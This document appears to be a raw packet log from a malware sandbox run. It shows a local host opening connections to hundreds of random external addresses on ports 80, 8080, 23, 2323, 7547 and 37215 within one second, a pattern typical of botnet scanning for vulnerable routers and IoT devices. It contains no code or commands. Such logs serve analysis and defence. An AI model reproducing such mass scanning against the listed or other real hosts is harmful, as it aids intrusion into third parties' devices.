                                          Nov 7, 2024 11:57:59.428200960 CET3044880192.168.2.132.60.30.95
                                          Nov 7, 2024 11:57:59.428205013 CET80254495.23.38.120192.168.2.13
                                          Nov 7, 2024 11:57:59.428211927 CET3044880192.168.2.132.183.163.162
                                          Nov 7, 2024 11:57:59.428211927 CET3044880192.168.2.132.134.135.124
                                          Nov 7, 2024 11:57:59.428215981 CET80254495.196.134.144192.168.2.13
                                          Nov 7, 2024 11:57:59.428215981 CET3044880192.168.2.132.249.81.152
                                          Nov 7, 2024 11:57:59.428219080 CET3044880192.168.2.132.164.42.155
                                          Nov 7, 2024 11:57:59.428226948 CET3044880192.168.2.132.143.150.61
                                          Nov 7, 2024 11:57:59.428232908 CET80254495.136.192.101192.168.2.13
                                          Nov 7, 2024 11:57:59.428242922 CET80254495.27.63.132192.168.2.13
                                          Nov 7, 2024 11:57:59.428246021 CET254480192.168.2.1395.23.38.120
                                          Nov 7, 2024 11:57:59.428246975 CET3044880192.168.2.132.249.143.214
                                          Nov 7, 2024 11:57:59.428252935 CET80254495.5.110.150192.168.2.13
                                          Nov 7, 2024 11:57:59.428263903 CET254480192.168.2.1395.196.134.144
                                          Nov 7, 2024 11:57:59.428267002 CET3044880192.168.2.132.206.8.142
                                          Nov 7, 2024 11:57:59.428267956 CET3044880192.168.2.132.173.74.98
                                          Nov 7, 2024 11:57:59.428267956 CET254480192.168.2.1395.136.192.101
                                          Nov 7, 2024 11:57:59.428271055 CET80254495.17.101.206192.168.2.13
                                          Nov 7, 2024 11:57:59.428277969 CET3044880192.168.2.132.176.84.223
                                          Nov 7, 2024 11:57:59.428280115 CET254480192.168.2.1395.27.63.132
                                          Nov 7, 2024 11:57:59.428282022 CET3044880192.168.2.132.142.90.61
                                          Nov 7, 2024 11:57:59.428287029 CET80254495.147.195.217192.168.2.13
                                          Nov 7, 2024 11:57:59.428297997 CET80254495.10.33.141192.168.2.13
                                          Nov 7, 2024 11:57:59.428302050 CET254480192.168.2.1395.5.110.150
                                          Nov 7, 2024 11:57:59.428308010 CET80254495.1.137.93192.168.2.13
                                          Nov 7, 2024 11:57:59.428318024 CET254480192.168.2.1395.17.101.206
                                          Nov 7, 2024 11:57:59.428318977 CET3044880192.168.2.132.119.191.227
                                          Nov 7, 2024 11:57:59.428339005 CET80254495.223.8.104192.168.2.13
                                          Nov 7, 2024 11:57:59.428342104 CET254480192.168.2.1395.10.33.141
                                          Nov 7, 2024 11:57:59.428342104 CET254480192.168.2.1395.1.137.93
                                          Nov 7, 2024 11:57:59.428343058 CET3044880192.168.2.132.210.10.247
                                          Nov 7, 2024 11:57:59.428348064 CET3044880192.168.2.132.165.147.41
                                          Nov 7, 2024 11:57:59.428349018 CET80254495.164.66.72192.168.2.13
                                          Nov 7, 2024 11:57:59.428348064 CET3044880192.168.2.132.128.70.77
                                          Nov 7, 2024 11:57:59.428348064 CET254480192.168.2.1395.147.195.217
                                          Nov 7, 2024 11:57:59.428352118 CET3044880192.168.2.132.255.145.146
                                          Nov 7, 2024 11:57:59.428359985 CET80254495.80.132.217192.168.2.13
                                          Nov 7, 2024 11:57:59.428366899 CET3044880192.168.2.132.21.31.122
                                          Nov 7, 2024 11:57:59.428366899 CET3044880192.168.2.132.19.18.253
                                          Nov 7, 2024 11:57:59.428370953 CET80254495.68.47.251192.168.2.13
                                          Nov 7, 2024 11:57:59.428370953 CET254480192.168.2.1395.223.8.104
                                          Nov 7, 2024 11:57:59.428380013 CET3044880192.168.2.132.112.119.83
                                          Nov 7, 2024 11:57:59.428380966 CET80254495.19.239.59192.168.2.13
                                          Nov 7, 2024 11:57:59.428390026 CET80254495.241.134.81192.168.2.13
                                          Nov 7, 2024 11:57:59.428400040 CET80254495.78.100.134192.168.2.13
                                          Nov 7, 2024 11:57:59.428401947 CET3044880192.168.2.132.17.130.106
                                          Nov 7, 2024 11:57:59.428404093 CET3044880192.168.2.132.121.76.38
                                          Nov 7, 2024 11:57:59.428404093 CET80254495.123.207.168192.168.2.13
                                          Nov 7, 2024 11:57:59.428410053 CET254480192.168.2.1395.68.47.251
                                          Nov 7, 2024 11:57:59.428410053 CET3044880192.168.2.132.34.170.2
                                          Nov 7, 2024 11:57:59.428410053 CET254480192.168.2.1395.164.66.72
                                          Nov 7, 2024 11:57:59.428410053 CET254480192.168.2.1395.80.132.217
                                          Nov 7, 2024 11:57:59.428416014 CET80254495.46.47.84192.168.2.13
                                          Nov 7, 2024 11:57:59.428417921 CET254480192.168.2.1395.19.239.59
                                          Nov 7, 2024 11:57:59.428421974 CET3044880192.168.2.132.4.245.70
                                          Nov 7, 2024 11:57:59.428423882 CET254480192.168.2.1395.78.100.134
                                          Nov 7, 2024 11:57:59.428423882 CET254480192.168.2.1395.241.134.81
                                          Nov 7, 2024 11:57:59.428425074 CET3044880192.168.2.132.8.146.44
                                          Nov 7, 2024 11:57:59.428426981 CET80254495.209.68.178192.168.2.13
                                          Nov 7, 2024 11:57:59.428431988 CET3044880192.168.2.132.66.92.223
                                          Nov 7, 2024 11:57:59.428433895 CET254480192.168.2.1395.123.207.168
                                          Nov 7, 2024 11:57:59.428433895 CET3044880192.168.2.132.121.29.245
                                          Nov 7, 2024 11:57:59.428436995 CET80254495.137.40.241192.168.2.13
                                          Nov 7, 2024 11:57:59.428452015 CET3044880192.168.2.132.92.103.154
                                          Nov 7, 2024 11:57:59.428453922 CET254480192.168.2.1395.209.68.178
                                          Nov 7, 2024 11:57:59.428453922 CET254480192.168.2.1395.46.47.84
                                          Nov 7, 2024 11:57:59.428453922 CET3044880192.168.2.132.228.11.239
                                          Nov 7, 2024 11:57:59.428457022 CET80254495.203.9.204192.168.2.13
                                          Nov 7, 2024 11:57:59.428467989 CET80254495.200.176.178192.168.2.13
                                          Nov 7, 2024 11:57:59.428472042 CET254480192.168.2.1395.137.40.241
                                          Nov 7, 2024 11:57:59.428478003 CET80254495.208.206.165192.168.2.13
                                          Nov 7, 2024 11:57:59.428483009 CET254480192.168.2.1395.203.9.204
                                          Nov 7, 2024 11:57:59.428488016 CET80254495.210.211.170192.168.2.13
                                          Nov 7, 2024 11:57:59.428489923 CET3044880192.168.2.132.121.154.123
                                          Nov 7, 2024 11:57:59.428498983 CET80254495.199.178.66192.168.2.13
                                          Nov 7, 2024 11:57:59.428504944 CET254480192.168.2.1395.200.176.178
                                          Nov 7, 2024 11:57:59.428504944 CET254480192.168.2.1395.208.206.165
                                          Nov 7, 2024 11:57:59.428507090 CET80254495.199.128.142192.168.2.13
                                          Nov 7, 2024 11:57:59.428507090 CET3044880192.168.2.132.18.133.178
                                          Nov 7, 2024 11:57:59.428512096 CET3044880192.168.2.132.188.105.47
                                          Nov 7, 2024 11:57:59.428512096 CET254480192.168.2.1395.210.211.170
                                          Nov 7, 2024 11:57:59.428519011 CET80254495.19.105.136192.168.2.13
                                          Nov 7, 2024 11:57:59.428528070 CET3044880192.168.2.132.140.43.89
                                          Nov 7, 2024 11:57:59.428529024 CET254480192.168.2.1395.199.178.66
                                          Nov 7, 2024 11:57:59.428530931 CET80254495.84.196.186192.168.2.13
                                          Nov 7, 2024 11:57:59.428544044 CET254480192.168.2.1395.199.128.142
                                          Nov 7, 2024 11:57:59.428545952 CET3044880192.168.2.132.242.62.63
                                          Nov 7, 2024 11:57:59.428550959 CET3044880192.168.2.132.130.40.234
                                          Nov 7, 2024 11:57:59.428550959 CET254480192.168.2.1395.19.105.136
                                          Nov 7, 2024 11:57:59.428560019 CET3044880192.168.2.132.144.8.200
                                          Nov 7, 2024 11:57:59.428582907 CET3044880192.168.2.132.205.157.107
                                          Nov 7, 2024 11:57:59.428589106 CET254480192.168.2.1395.84.196.186
                                          Nov 7, 2024 11:57:59.428589106 CET3044880192.168.2.132.203.230.188
                                          Nov 7, 2024 11:57:59.428625107 CET3044880192.168.2.132.64.86.103
                                          Nov 7, 2024 11:57:59.428628922 CET3044880192.168.2.132.104.157.221
                                          Nov 7, 2024 11:57:59.428628922 CET3044880192.168.2.132.68.195.224
                                          Nov 7, 2024 11:57:59.428628922 CET3044880192.168.2.132.116.32.16
                                          Nov 7, 2024 11:57:59.428628922 CET3044880192.168.2.132.2.105.249
                                          Nov 7, 2024 11:57:59.428642035 CET3044880192.168.2.132.190.132.73
                                          Nov 7, 2024 11:57:59.428646088 CET3044880192.168.2.132.220.186.115
                                          Nov 7, 2024 11:57:59.428661108 CET3044880192.168.2.132.43.124.24
                                          Nov 7, 2024 11:57:59.428661108 CET3044880192.168.2.132.139.126.160
                                          Nov 7, 2024 11:57:59.428663015 CET3044880192.168.2.132.19.32.137
                                          Nov 7, 2024 11:57:59.428668976 CET3044880192.168.2.132.59.23.232
                                          Nov 7, 2024 11:57:59.428669930 CET3044880192.168.2.132.239.6.252
                                          Nov 7, 2024 11:57:59.428677082 CET3044880192.168.2.132.210.37.50
                                          Nov 7, 2024 11:57:59.428677082 CET3044880192.168.2.132.66.111.100
                                          Nov 7, 2024 11:57:59.428690910 CET3044880192.168.2.132.62.211.221
                                          Nov 7, 2024 11:57:59.428690910 CET3044880192.168.2.132.25.39.147
                                          Nov 7, 2024 11:57:59.428692102 CET3044880192.168.2.132.187.21.232
                                          Nov 7, 2024 11:57:59.428692102 CET3044880192.168.2.132.12.83.225
                                          Nov 7, 2024 11:57:59.428708076 CET3044880192.168.2.132.122.130.237
                                          Nov 7, 2024 11:57:59.428711891 CET3044880192.168.2.132.232.163.75
                                          Nov 7, 2024 11:57:59.428713083 CET3044880192.168.2.132.185.157.220
                                          Nov 7, 2024 11:57:59.428714991 CET3044880192.168.2.132.88.28.92
                                          Nov 7, 2024 11:57:59.428724051 CET3044880192.168.2.132.238.89.208
                                          Nov 7, 2024 11:57:59.428742886 CET3044880192.168.2.132.237.163.237
                                          Nov 7, 2024 11:57:59.428749084 CET3044880192.168.2.132.5.35.40
                                          Nov 7, 2024 11:57:59.428749084 CET3044880192.168.2.132.160.44.2
                                          Nov 7, 2024 11:57:59.428750038 CET3044880192.168.2.132.56.205.12
                                          Nov 7, 2024 11:57:59.428750992 CET3044880192.168.2.132.165.90.180
                                          Nov 7, 2024 11:57:59.428750992 CET3044880192.168.2.132.87.126.61
                                          Nov 7, 2024 11:57:59.428752899 CET3044880192.168.2.132.238.97.219
                                          Nov 7, 2024 11:57:59.428767920 CET3044880192.168.2.132.58.183.55
                                          Nov 7, 2024 11:57:59.428775072 CET3044880192.168.2.132.95.152.92
                                          Nov 7, 2024 11:57:59.428782940 CET3044880192.168.2.132.134.103.87
                                          Nov 7, 2024 11:57:59.428796053 CET3044880192.168.2.132.155.184.97
                                          Nov 7, 2024 11:57:59.428797007 CET3044880192.168.2.132.65.250.141
                                          Nov 7, 2024 11:57:59.428797007 CET3044880192.168.2.132.169.49.130
                                          Nov 7, 2024 11:57:59.428800106 CET3044880192.168.2.132.250.252.165
                                          Nov 7, 2024 11:57:59.428800106 CET3044880192.168.2.132.250.203.210
                                          Nov 7, 2024 11:57:59.428811073 CET3044880192.168.2.132.132.239.212
                                          Nov 7, 2024 11:57:59.428833961 CET3044880192.168.2.132.148.161.202
                                          Nov 7, 2024 11:57:59.428833961 CET3044880192.168.2.132.15.167.64
                                          Nov 7, 2024 11:57:59.428838968 CET3044880192.168.2.132.20.219.224
                                          Nov 7, 2024 11:57:59.428848028 CET3044880192.168.2.132.28.81.63
                                          Nov 7, 2024 11:57:59.428854942 CET3044880192.168.2.132.140.6.237
                                          Nov 7, 2024 11:57:59.428867102 CET3044880192.168.2.132.81.220.53
                                          Nov 7, 2024 11:57:59.428875923 CET3044880192.168.2.132.114.250.126
                                          Nov 7, 2024 11:57:59.428879023 CET3044880192.168.2.132.185.62.241
                                          Nov 7, 2024 11:57:59.428888083 CET3044880192.168.2.132.152.51.16
                                          Nov 7, 2024 11:57:59.428891897 CET3044880192.168.2.132.184.27.124
                                          Nov 7, 2024 11:57:59.428891897 CET3044880192.168.2.132.171.62.135
                                          Nov 7, 2024 11:57:59.428891897 CET3044880192.168.2.132.184.90.210
                                          Nov 7, 2024 11:57:59.428906918 CET3044880192.168.2.132.38.74.17
                                          Nov 7, 2024 11:57:59.428915024 CET3044880192.168.2.132.68.165.205
                                          Nov 7, 2024 11:57:59.428917885 CET3044880192.168.2.132.204.149.16
                                          Nov 7, 2024 11:57:59.428925991 CET3044880192.168.2.132.195.128.112
                                          Nov 7, 2024 11:57:59.428936005 CET3044880192.168.2.132.82.26.1
                                          Nov 7, 2024 11:57:59.428949118 CET3044880192.168.2.132.40.124.87
                                          Nov 7, 2024 11:57:59.428955078 CET3044880192.168.2.132.104.243.129
                                          Nov 7, 2024 11:57:59.428956985 CET3044880192.168.2.132.18.195.147
                                          Nov 7, 2024 11:57:59.428956985 CET3044880192.168.2.132.12.113.138
                                          Nov 7, 2024 11:57:59.428956985 CET3044880192.168.2.132.31.98.248
                                          Nov 7, 2024 11:57:59.428963900 CET3044880192.168.2.132.146.211.51
                                          Nov 7, 2024 11:57:59.428978920 CET3044880192.168.2.132.44.135.252
                                          Nov 7, 2024 11:57:59.428988934 CET3044880192.168.2.132.8.77.138
                                          Nov 7, 2024 11:57:59.429007053 CET3044880192.168.2.132.15.247.85
                                          Nov 7, 2024 11:57:59.429012060 CET3044880192.168.2.132.121.215.68
                                          Nov 7, 2024 11:57:59.429013968 CET3044880192.168.2.132.156.45.151
                                          Nov 7, 2024 11:57:59.429014921 CET3044880192.168.2.132.10.149.87
                                          Nov 7, 2024 11:57:59.429023027 CET3044880192.168.2.132.61.189.207
                                          Nov 7, 2024 11:57:59.429038048 CET3044880192.168.2.132.239.156.35
                                          Nov 7, 2024 11:57:59.429043055 CET3044880192.168.2.132.93.155.100
                                          Nov 7, 2024 11:57:59.429061890 CET3044880192.168.2.132.238.225.244
                                          Nov 7, 2024 11:57:59.429064989 CET3044880192.168.2.132.226.236.85
                                          Nov 7, 2024 11:57:59.429064989 CET3044880192.168.2.132.157.203.26
                                          Nov 7, 2024 11:57:59.429080963 CET3044880192.168.2.132.175.105.232
                                          Nov 7, 2024 11:57:59.429080963 CET3044880192.168.2.132.186.186.165
                                          Nov 7, 2024 11:57:59.429081917 CET3044880192.168.2.132.208.13.101
                                          Nov 7, 2024 11:57:59.429084063 CET3044880192.168.2.132.11.20.54
                                          Nov 7, 2024 11:57:59.429100037 CET3044880192.168.2.132.69.223.68
                                          Nov 7, 2024 11:57:59.429107904 CET3044880192.168.2.132.244.199.176
                                          Nov 7, 2024 11:57:59.429114103 CET3044880192.168.2.132.231.234.182
                                          Nov 7, 2024 11:57:59.429117918 CET3044880192.168.2.132.42.204.65
                                          Nov 7, 2024 11:57:59.429121971 CET3044880192.168.2.132.221.243.247
                                          Nov 7, 2024 11:57:59.429137945 CET373487547192.168.2.135.8.101.228
                                          Nov 7, 2024 11:57:59.429151058 CET3044880192.168.2.132.160.218.100
                                          Nov 7, 2024 11:57:59.429162025 CET3044880192.168.2.132.159.159.16
                                          Nov 7, 2024 11:57:59.429172039 CET3044880192.168.2.132.253.229.39
                                          Nov 7, 2024 11:57:59.429174900 CET3044880192.168.2.132.33.232.128
                                          Nov 7, 2024 11:57:59.429174900 CET3044880192.168.2.132.89.83.218
                                          Nov 7, 2024 11:57:59.429178953 CET3044880192.168.2.132.110.154.209
                                          Nov 7, 2024 11:57:59.429186106 CET3044880192.168.2.132.160.45.78
                                          Nov 7, 2024 11:57:59.429194927 CET3044880192.168.2.132.173.107.206
                                          Nov 7, 2024 11:57:59.429207087 CET3044880192.168.2.132.94.136.230
                                          Nov 7, 2024 11:57:59.429209948 CET3044880192.168.2.132.24.73.150
                                          Nov 7, 2024 11:57:59.429227114 CET3044880192.168.2.132.183.184.195
                                          Nov 7, 2024 11:57:59.429228067 CET3044880192.168.2.132.71.14.194
                                          Nov 7, 2024 11:57:59.429228067 CET3044880192.168.2.132.178.35.248
                                          Nov 7, 2024 11:57:59.429229021 CET3044880192.168.2.132.67.130.184
                                          Nov 7, 2024 11:57:59.429239988 CET3044880192.168.2.132.4.21.243
                                          Nov 7, 2024 11:57:59.429244995 CET3044880192.168.2.132.148.18.72
                                          Nov 7, 2024 11:57:59.429251909 CET3044880192.168.2.132.217.157.110
                                          Nov 7, 2024 11:57:59.429260015 CET3044880192.168.2.132.213.199.31
                                          Nov 7, 2024 11:57:59.429261923 CET3044880192.168.2.132.228.126.37
                                          Nov 7, 2024 11:57:59.429265976 CET3044880192.168.2.132.241.201.179
                                          Nov 7, 2024 11:57:59.429281950 CET3044880192.168.2.132.140.201.136
                                          Nov 7, 2024 11:57:59.429281950 CET3044880192.168.2.132.203.225.109
                                          Nov 7, 2024 11:57:59.429281950 CET3044880192.168.2.132.73.4.31
                                          Nov 7, 2024 11:57:59.429292917 CET3044880192.168.2.132.159.105.104
                                          Nov 7, 2024 11:57:59.429292917 CET3044880192.168.2.132.128.172.243
                                          Nov 7, 2024 11:57:59.429294109 CET3044880192.168.2.132.219.215.94
                                          Nov 7, 2024 11:57:59.429306030 CET3044880192.168.2.132.76.59.233
                                          Nov 7, 2024 11:57:59.429322958 CET3044880192.168.2.132.67.12.69
                                          Nov 7, 2024 11:57:59.429337978 CET3044880192.168.2.132.84.227.17
                                          Nov 7, 2024 11:57:59.429347992 CET3044880192.168.2.132.109.82.194
                                          Nov 7, 2024 11:57:59.429347992 CET3044880192.168.2.132.85.57.26
                                          Nov 7, 2024 11:57:59.429347992 CET3044880192.168.2.132.178.41.62
                                          Nov 7, 2024 11:57:59.429351091 CET385422323192.168.2.13160.165.32.120
                                          Nov 7, 2024 11:57:59.429353952 CET3044880192.168.2.132.64.17.152
                                          Nov 7, 2024 11:57:59.429353952 CET3044880192.168.2.132.10.89.67
                                          Nov 7, 2024 11:57:59.429368019 CET3044880192.168.2.132.156.13.26
                                          Nov 7, 2024 11:57:59.429379940 CET3044880192.168.2.132.122.221.156
                                          Nov 7, 2024 11:57:59.429379940 CET3044880192.168.2.132.2.241.124
                                          Nov 7, 2024 11:57:59.429383039 CET3044880192.168.2.132.210.64.181
                                          Nov 7, 2024 11:57:59.429402113 CET3044880192.168.2.132.134.8.211
                                          Nov 7, 2024 11:57:59.429403067 CET3044880192.168.2.132.139.216.219
                                          Nov 7, 2024 11:57:59.429404020 CET3044880192.168.2.132.72.230.87
                                          Nov 7, 2024 11:57:59.429421902 CET3044880192.168.2.132.23.237.162
                                          Nov 7, 2024 11:57:59.429425955 CET3044880192.168.2.132.28.28.57
                                          Nov 7, 2024 11:57:59.429428101 CET3044880192.168.2.132.123.50.228
                                          Nov 7, 2024 11:57:59.429459095 CET3044880192.168.2.132.244.16.85
                                          Nov 7, 2024 11:57:59.429460049 CET3044880192.168.2.132.124.190.214
                                          Nov 7, 2024 11:57:59.429462910 CET3044880192.168.2.132.160.205.29
                                          Nov 7, 2024 11:57:59.429462910 CET3044880192.168.2.132.28.17.254
                                          Nov 7, 2024 11:57:59.429480076 CET3044880192.168.2.132.125.54.113
                                          Nov 7, 2024 11:57:59.429485083 CET3044880192.168.2.132.67.249.160
                                          Nov 7, 2024 11:57:59.429485083 CET3044880192.168.2.132.59.195.103
                                          Nov 7, 2024 11:57:59.429488897 CET3044880192.168.2.132.112.243.55
                                          Nov 7, 2024 11:57:59.429502010 CET3044880192.168.2.132.75.150.110
                                          Nov 7, 2024 11:57:59.429510117 CET3044880192.168.2.132.57.53.69
                                          Nov 7, 2024 11:57:59.429510117 CET3044880192.168.2.132.234.231.6
                                          Nov 7, 2024 11:57:59.429529905 CET3044880192.168.2.132.100.196.65
                                          Nov 7, 2024 11:57:59.429534912 CET3044880192.168.2.132.30.198.55
                                          Nov 7, 2024 11:57:59.429544926 CET3044880192.168.2.132.35.47.127
                                          Nov 7, 2024 11:57:59.429544926 CET3044880192.168.2.132.223.133.17
                                          Nov 7, 2024 11:57:59.429553032 CET3044880192.168.2.132.37.95.188
                                          Nov 7, 2024 11:57:59.429565907 CET3044880192.168.2.132.132.41.181
                                          Nov 7, 2024 11:57:59.429575920 CET3044880192.168.2.132.183.164.234
                                          Nov 7, 2024 11:57:59.429594040 CET3044880192.168.2.132.69.114.170
                                          Nov 7, 2024 11:57:59.429594040 CET3044880192.168.2.132.27.154.130
                                          Nov 7, 2024 11:57:59.429594994 CET3044880192.168.2.132.124.227.238
                                          Nov 7, 2024 11:57:59.429594994 CET3044880192.168.2.132.129.105.73
                                          Nov 7, 2024 11:57:59.429604053 CET3044880192.168.2.132.210.51.141
                                          Nov 7, 2024 11:57:59.429605961 CET3044880192.168.2.132.5.57.135
                                          Nov 7, 2024 11:57:59.429621935 CET3044880192.168.2.132.177.23.39
                                          Nov 7, 2024 11:57:59.429625034 CET3044880192.168.2.132.44.138.199
                                          Nov 7, 2024 11:57:59.429625988 CET3044880192.168.2.132.159.173.176
                                          Nov 7, 2024 11:57:59.429625988 CET3044880192.168.2.132.112.4.11
                                          Nov 7, 2024 11:57:59.429636002 CET3044880192.168.2.132.127.31.120
                                          Nov 7, 2024 11:57:59.429642916 CET3044880192.168.2.132.36.205.214
                                          Nov 7, 2024 11:57:59.429642916 CET3044880192.168.2.132.214.230.123
                                          Nov 7, 2024 11:57:59.429658890 CET3044880192.168.2.132.29.24.27
                                          Nov 7, 2024 11:57:59.429666042 CET3044880192.168.2.132.137.32.149
                                          Nov 7, 2024 11:57:59.429666042 CET3044880192.168.2.132.159.182.190
                                          Nov 7, 2024 11:57:59.429675102 CET3044880192.168.2.132.103.98.1
                                          Nov 7, 2024 11:57:59.429692030 CET3044880192.168.2.132.251.192.191
                                          Nov 7, 2024 11:57:59.429692030 CET3044880192.168.2.132.117.106.220
                                          Nov 7, 2024 11:57:59.429698944 CET3044880192.168.2.132.165.123.240
                                          Nov 7, 2024 11:57:59.429708958 CET3044880192.168.2.132.40.56.181
                                          Nov 7, 2024 11:57:59.429708958 CET3044880192.168.2.132.255.253.24
                                          Nov 7, 2024 11:57:59.429709911 CET3044880192.168.2.132.51.28.51
                                          Nov 7, 2024 11:57:59.429709911 CET3044880192.168.2.132.253.21.236
                                          Nov 7, 2024 11:57:59.429713964 CET3044880192.168.2.132.247.126.2
                                          Nov 7, 2024 11:57:59.429713964 CET3044880192.168.2.132.92.60.103
                                          Nov 7, 2024 11:57:59.429713964 CET3044880192.168.2.132.151.247.207
                                          Nov 7, 2024 11:57:59.429734945 CET3044880192.168.2.132.32.200.206
                                          Nov 7, 2024 11:57:59.429734945 CET3044880192.168.2.132.213.98.156
                                          Nov 7, 2024 11:57:59.429742098 CET3044880192.168.2.132.38.3.128
                                          Nov 7, 2024 11:57:59.429742098 CET3044880192.168.2.132.209.211.35
                                          Nov 7, 2024 11:57:59.429744959 CET3044880192.168.2.132.166.237.158
                                          Nov 7, 2024 11:57:59.429764032 CET3044880192.168.2.132.126.183.48
                                          Nov 7, 2024 11:57:59.429764986 CET3044880192.168.2.132.110.78.120
                                          Nov 7, 2024 11:57:59.429770947 CET3044880192.168.2.132.96.140.251
                                          Nov 7, 2024 11:57:59.429776907 CET3044880192.168.2.132.35.186.194
                                          Nov 7, 2024 11:57:59.429776907 CET3044880192.168.2.132.202.146.4
                                          Nov 7, 2024 11:57:59.429790020 CET3044880192.168.2.132.4.157.185
                                          Nov 7, 2024 11:57:59.429802895 CET3044880192.168.2.132.39.69.5
                                          Nov 7, 2024 11:57:59.429811001 CET3044880192.168.2.132.47.172.9
                                          Nov 7, 2024 11:57:59.429816008 CET3044880192.168.2.132.202.63.34
                                          Nov 7, 2024 11:57:59.429819107 CET3044880192.168.2.132.212.223.129
                                          Nov 7, 2024 11:57:59.429820061 CET3044880192.168.2.132.93.119.36
                                          Nov 7, 2024 11:57:59.429820061 CET3044880192.168.2.132.148.185.39
                                          Nov 7, 2024 11:57:59.429833889 CET3044880192.168.2.132.254.184.93
                                          Nov 7, 2024 11:57:59.429841042 CET3044880192.168.2.132.6.132.184
                                          Nov 7, 2024 11:57:59.429847956 CET3044880192.168.2.132.198.130.213
                                          Nov 7, 2024 11:57:59.429847956 CET3044880192.168.2.132.212.219.248
                                          Nov 7, 2024 11:57:59.429855108 CET3044880192.168.2.132.190.19.218
                                          Nov 7, 2024 11:57:59.429886103 CET3044880192.168.2.132.164.119.130
                                          Nov 7, 2024 11:57:59.429886103 CET3044880192.168.2.132.243.180.115
                                          Nov 7, 2024 11:57:59.429886103 CET3044880192.168.2.132.110.56.143
                                          Nov 7, 2024 11:57:59.429886103 CET3044880192.168.2.132.126.218.211
                                          Nov 7, 2024 11:57:59.429898977 CET3044880192.168.2.132.151.160.195
                                          Nov 7, 2024 11:57:59.429903984 CET3044880192.168.2.132.67.223.188
                                          Nov 7, 2024 11:57:59.429904938 CET3044880192.168.2.132.105.157.147
                                          Nov 7, 2024 11:57:59.429907084 CET3044880192.168.2.132.181.185.204
                                          Nov 7, 2024 11:57:59.429910898 CET3044880192.168.2.132.225.137.251
                                          Nov 7, 2024 11:57:59.429915905 CET3044880192.168.2.132.85.42.144
                                          Nov 7, 2024 11:57:59.429919004 CET3044880192.168.2.132.24.10.250
                                          Nov 7, 2024 11:57:59.429934025 CET3044880192.168.2.132.185.201.121
                                          Nov 7, 2024 11:57:59.429934025 CET3044880192.168.2.132.183.106.91
                                          Nov 7, 2024 11:57:59.429944992 CET3044880192.168.2.132.157.174.167
                                          Nov 7, 2024 11:57:59.429955006 CET3044880192.168.2.132.26.225.28
                                          Nov 7, 2024 11:57:59.429969072 CET80254495.64.30.143192.168.2.13
                                          Nov 7, 2024 11:57:59.429975033 CET3044880192.168.2.132.192.212.204
                                          Nov 7, 2024 11:57:59.429977894 CET3044880192.168.2.132.170.213.83
                                          Nov 7, 2024 11:57:59.429980040 CET3044880192.168.2.132.188.126.28
                                          Nov 7, 2024 11:57:59.429980993 CET80254495.5.83.0192.168.2.13
                                          Nov 7, 2024 11:57:59.429991007 CET80254495.248.237.41192.168.2.13
                                          Nov 7, 2024 11:57:59.429992914 CET3044880192.168.2.132.190.57.2
                                          Nov 7, 2024 11:57:59.430001020 CET80254495.18.3.117192.168.2.13
                                          Nov 7, 2024 11:57:59.430001974 CET254480192.168.2.1395.5.83.0
                                          Nov 7, 2024 11:57:59.430011034 CET2358456187.228.170.8192.168.2.13
                                          Nov 7, 2024 11:57:59.430011988 CET254480192.168.2.1395.64.30.143
                                          Nov 7, 2024 11:57:59.430018902 CET3044880192.168.2.132.2.141.158
                                          Nov 7, 2024 11:57:59.430023909 CET254480192.168.2.1395.248.237.41
                                          Nov 7, 2024 11:57:59.430028915 CET254480192.168.2.1395.18.3.117
                                          Nov 7, 2024 11:57:59.430032015 CET754759598168.30.180.55192.168.2.13
                                          Nov 7, 2024 11:57:59.430037022 CET3044880192.168.2.132.255.208.131
                                          Nov 7, 2024 11:57:59.430042028 CET3044880192.168.2.132.217.22.171
                                          Nov 7, 2024 11:57:59.430042982 CET3044880192.168.2.132.222.213.199
                                          Nov 7, 2024 11:57:59.430042982 CET2341122165.193.23.30192.168.2.13
                                          Nov 7, 2024 11:57:59.430044889 CET5845623192.168.2.13187.228.170.8
                                          Nov 7, 2024 11:57:59.430054903 CET754755804198.219.183.55192.168.2.13
                                          Nov 7, 2024 11:57:59.430069923 CET3044880192.168.2.132.159.28.234
                                          Nov 7, 2024 11:57:59.430071115 CET3044880192.168.2.132.108.222.63
                                          Nov 7, 2024 11:57:59.430074930 CET2352754220.188.148.202192.168.2.13
                                          Nov 7, 2024 11:57:59.430078030 CET595987547192.168.2.13168.30.180.55
                                          Nov 7, 2024 11:57:59.430085897 CET754737300165.239.16.148192.168.2.13
                                          Nov 7, 2024 11:57:59.430088043 CET4112223192.168.2.13165.193.23.30
                                          Nov 7, 2024 11:57:59.430094957 CET558047547192.168.2.13198.219.183.55
                                          Nov 7, 2024 11:57:59.430104017 CET5275423192.168.2.13220.188.148.202
                                          Nov 7, 2024 11:57:59.430107117 CET2354956182.233.196.192192.168.2.13
                                          Nov 7, 2024 11:57:59.430118084 CET754736156203.84.99.53192.168.2.13
                                          Nov 7, 2024 11:57:59.430128098 CET3721530704156.236.65.205192.168.2.13
                                          Nov 7, 2024 11:57:59.430130005 CET3044880192.168.2.132.141.194.239
                                          Nov 7, 2024 11:57:59.430135965 CET373007547192.168.2.13165.239.16.148
                                          Nov 7, 2024 11:57:59.430143118 CET3721530704156.138.175.35192.168.2.13
                                          Nov 7, 2024 11:57:59.430152893 CET3721530704156.41.54.98192.168.2.13
                                          Nov 7, 2024 11:57:59.430157900 CET5495623192.168.2.13182.233.196.192
                                          Nov 7, 2024 11:57:59.430157900 CET361567547192.168.2.13203.84.99.53
                                          Nov 7, 2024 11:57:59.430162907 CET3070437215192.168.2.13156.236.65.205
                                          Nov 7, 2024 11:57:59.430162907 CET3044880192.168.2.132.142.95.165
                                          Nov 7, 2024 11:57:59.430164099 CET3721530704156.155.173.69192.168.2.13
                                          Nov 7, 2024 11:57:59.430169106 CET3070437215192.168.2.13156.138.175.35
                                          Nov 7, 2024 11:57:59.430176020 CET3721530704156.45.252.12192.168.2.13
                                          Nov 7, 2024 11:57:59.430186987 CET3070437215192.168.2.13156.41.54.98
                                          Nov 7, 2024 11:57:59.430186987 CET3044880192.168.2.132.75.85.164
                                          Nov 7, 2024 11:57:59.430192947 CET3721530704156.80.140.233192.168.2.13
                                          Nov 7, 2024 11:57:59.430201054 CET3070437215192.168.2.13156.155.173.69
                                          Nov 7, 2024 11:57:59.430201054 CET3070437215192.168.2.13156.45.252.12
                                          Nov 7, 2024 11:57:59.430203915 CET3721530704156.251.88.190192.168.2.13
                                          Nov 7, 2024 11:57:59.430213928 CET3044880192.168.2.132.197.213.204
                                          Nov 7, 2024 11:57:59.430214882 CET3721530704156.212.233.151192.168.2.13
                                          Nov 7, 2024 11:57:59.430224895 CET3721530704156.234.253.140192.168.2.13
